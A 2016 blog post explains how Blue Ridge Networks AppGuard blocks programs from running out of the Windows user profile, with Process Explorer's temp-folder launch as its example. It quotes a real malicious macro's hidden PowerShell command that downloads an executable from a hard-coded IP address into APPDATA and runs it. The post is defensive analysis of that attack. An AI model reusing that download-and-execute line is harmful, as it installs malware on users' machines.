4 June 2016

Sysinternals Process Explorer is one of my favorite tools. And the best tool to gain an insight into the operations of Blue Ridge Networks AppGuard.

Process Explorer process tree

Process Explorer process tree details

When Process Explorer starts in Windows 10 (64 bit Version) the process is started as a child process of the user’s Explorer process. This start process extracts the 64 bit version of Process Explorer to the local temporary files directory  C:\users\kjochem\AppData\Local\Temp\procexp64.exe and runs the 64 bit version from this directory.

Modern Windows operating systems protect themselves against unintentional changes by users. They restrict change access of users to few directories, e.g. to directory C:\users\<username> in the so-called User Space and prevent write access to the System Space, e.g. C:\windows\system32, unless the user does not work with administrative privileges permanently.

When a user opens a weaponized Word document the Word application is executed in User Space. Thus the Word macro can write commands for the download of malicious content from the attacker’s command & control server to the User Space only. And downloads must be stored in User Space, and thus executed from User Space.

The script below shows how state-of-the-Art malware works. The commands are created by the AutoOpen macro in Word document 839482-Invoice-April.docm, which is identified as e.g. TrojanDownloader.Agent.BEO by ESET-NOD32, W97M.Downloader by Symantec, or WIN32/Spursint.A!cl by Windows Defender.

C:\WINDOWS\system32\cmd.exe /c PowerShell -ExecutionPolicy bypass -noprofile
-windowstyle hidden (New-Object System.Net.WebClient).DownloadFile
 (1) ('http://201.130.72.171/andac.exe','%APPDATA%\MicrosoftLan.exe');
 (2) Start-Process '%APPDATA%\MicrosoftLan.exe'

In this example the (1) andax.exe is downloaded to the user’s APPDATA directory and started (2) from the APPDATA directory afterwards. Shell Variable APPDATA expands on evaluation to C:\users\kjochem\AppData\Roaming.

The same holds for Drive-by Downloads. In the absence of write access outside the User Space the payload of Drive-by Downloads is stored in and executed from User Space.

AppGuard blocks such attacks by preventing the execution of suspicious programs from User space. Quite simple, but very effective.

After installation the default User Space settings already ensure a high level of protection:

AppGuard default User Space Protection

In Locked Down mode AppGuard blocks the execution of programs from User Space. With this, the execution of Process Explorer is blocked because program procexp64.exe is executed from a subdirectory of User Space:

AppGuard Blocks Process Explorer

Process Explorer Error Message

Quite simple, but very effective. More about the protection concept of AppGuard next week …

Have a good weekend.